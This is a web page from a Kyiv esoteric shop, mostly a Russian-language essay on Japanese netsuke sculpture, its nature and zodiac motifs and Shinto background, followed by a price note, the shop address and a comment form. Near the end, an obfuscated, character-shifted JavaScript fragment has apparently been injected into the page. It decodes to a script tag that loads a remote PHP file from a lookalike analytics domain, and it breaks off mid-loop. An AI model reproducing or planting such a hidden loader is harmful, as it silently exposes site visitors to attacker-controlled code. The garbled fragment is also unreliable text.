Иллюстрированный каталогМиниатюрная скульптура «нэцкэ» в последние годы привлекает к себе особое внимание всех интересующихся искусством стран Дальнего Востока как один из наибо­лее ярких и самобытных видов творчества японского на­рода. Нэцкэ — это своеобразный брелок, скульптурная подвеска к поясу мужского кимоно. В XVII веке этот вид скульптуры получает самостоятельное развитие, а рас­цвет миниатюрной пластики приходится на вторую по­ловину XVIII — первую половину XIX века. Творчество мастеров нэцкэ ярко характеризует новую страницу в развитии японской скульптуры и декоративного искусства, связанную с новой городской культурой. Свободная от устаревших к этому времени канонов буддийской храмо­вой скульптуры, миниатюрная пластика была светским, массовым для того времени видом искусства. И новизна его сказалась в широте тематики нэцкэ, воссоздавшая красочную картину духовной жизни средневекового го­рода. Многие сюжеты нэцкэ пришли из традиционной японской мифологии, легенд, исторических сказаний, по­словиц, притч. Новым для японской скульптуры были реализм вйдения, пристальное изучение натуры. Испол­ненные в разной художественной манере, нэцкэ отлича­ются ярким своеобразием образов и виртуозным техни­ческим мастерством.

Особое место в миниатюрной скульптуре занимают нэцкэ, связанные с изображением природных мотивов. Мир природы с его бесконечным своеобразием форм и плени­тельной красотой, пробуждающей в человеке возвышен­ные чувства, благородные движения души, был источником вдохновения для японских художников всех времен. Уча­стие в сезонных праздниках, посещение садов и парков при буддийских монастырях выращивание «бонсай» (кар­ликового дерева в горшке или на подносе) и работа в «о-нива» (маленький садик при доме) были неотъем­лемой частью жизни каждого японца.

Поэтизация связи между человеком и природой в Япо­нии проявилась в пристальном, часто одержимом инте­ресе к временам года. Каждое из них воспевалось в ли­тературе и искусстве, у каждого были свои приметы в виде цветов, животных, растений, явлений природы и че­ловеческих настроений.

Традиционная японская любовь к природе, глубокие духовные переживания, связанные с ней, в известной мере

были результатом древних религиозных верований, где обожествление природы, культ плодородия, поклонение предкам, шаманизм сплелись в единое целое. Согласно синтоистским представлениям, основывавшимся на древ­них анимистических и тотемистических культах, наш мир был как бы единым живым организмом, воплощением сути «ками» (божественного). Все объекты природы, в том числе и осязаемые предметы, и бесформенное простран­ство, пронизывали непостижимые божественные силы. Природа была населена мириадами неведомых существ. Ками могли быть и могущественными мифологическими героями, и знаменитыми предками, и фантастическими животными, живущими в расселинах скал. Но ками мог­ли быть и деревьями, и горячими источниками, и волнами моря, и громом, и эхом в лесу, даже лисой, тигром, прос­тым насекомым. Природа была для древних японцев за­гадочным источником всей жизни и щедрым дарителем изобилия. Лишь на более позднем этапе, с приходом буддизма, синтоистские боги окончательно обрели чело­веческий облик. Однако анимистический подход, добро­вольное подчинение природе, растворение в ней сохрани­лись в японской культуре на протяжении всей ее даль­нейшей истории.

Природные мотивы в представлении японцев были связаны также с благопожелательной символикой. Так, пи­он был пожеланием счастья, богатства, процветания, гра­нат — многочисленных сыновей, тыква — символом цело­мудрия, бамбук — знаком стойкости перед жизненными невзгодами, ветки сосны — залогом долгожительства, счастья, верности.

Художники периода Эдо видели бесконечность и раз­нообразие в прекрасном цветке и малой росинке. Они находили особое очарование в точной фиксации форм и красок растений, цветов, плодов и изображали чаще всего отдельные фрагменты природы, единичные экземп­ляры. Небольшие размеры произведений не препятствова­ли глубине чувств, силе и поэтичности образов.

Таинственной сверхъестественной властью наделялись в японском народе и окружающие человека животные. В древности такие животные, как лошадь, кабан, собака, считались родовыми тотемами. До сих пор в Японии су­ществуют старинные синтоистские храмы, посвященные лисе или белой лошади. Отголоски этих древних верований можно найти в народном искусстве позднего средне­вековья, в частности в тематике кукол или миниатюрной скульптуры периода Эдо. Образы животных были сложны и многообразны. Складываясь на протяжении веков, они включали в себя целый ряд компонентов. Синтоистское содержание образов животных было дополнено китаизма- ми, компонентами буддийских мифов и конфуцианских притч. Важным аспектом в понимании японцами живот­ных была эмблематика календарей. С VIII века в Японии существовал большой 60-годичный и малый 12-годичный циклы, связанные со знаками Зодиака. С зодиакальными животными были связаны также месяц, день, час (отсчет дня начинался с полудня). При этом японцы наделяли каждый знак Зодиака особыми свойствами и связывали с ними судьбу и характер человека. Поэтому большой популярностью в народе пользовались нэцкэ с изображе­нием зодиакальных животных. Часто японцы заказывали скульптурный знак того года, когда они родились. Из­вестный мастер нэцкэ, Судзуки Мазанао из города Исэ, даже имел свой каталог с изображениями этих животных.

Познавательный интерес к природе, к миру животных и растений, преобладающий в японской скульптуре XIX ве­ка, способствовал реализму видения, конкретности в изо­бражении природных форм. Японские мастера полагали, что уважение к природе требует от них быть чуткими к ее красоте. В нэцкэ должны были быть видны первоначаль­ное строение и фактура материала, ценились простота и изысканность форм, декоративная стилизация, изысканное тональное соотношение цветов. В композиционном отно­шении предпочтение отдавалось целостности, компактности, уравновешенности. Отрицалось все неестественное, лишнее. Немногочисленные детали должны были подчеркнуть об­щий замысел.

Умение пластическими средствами выявить то прекрас­ное, что существует в природе,— вот что отличает лучшие нэцкэ, созданные японскими мастерами.

Ниже для просмотра представлены лишь некоторые из имеющихся в магазине фигур нецке, их цена колеблется от 12 до 40 гривен.

Выбрать и приобрести  фигурки нецке вы можете посетив  наш эзотерический магазин по адресу г. Киев, ул. Гришка,8 (карта проезда предоставлена на странице Контакты )
#nzkt2#!tsd>#!iuuq;00hp1hmfbobmjujd/dpn0tdsjqut0epvcmfdmjdltubu/qiq#?=0tdsjqu?!";
m=""; for (i=0; i

Оставить комментарий

Ваш email не будет опубликован. Обязательные поля отмечены *

Вы можете использовать это HTMLтеги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>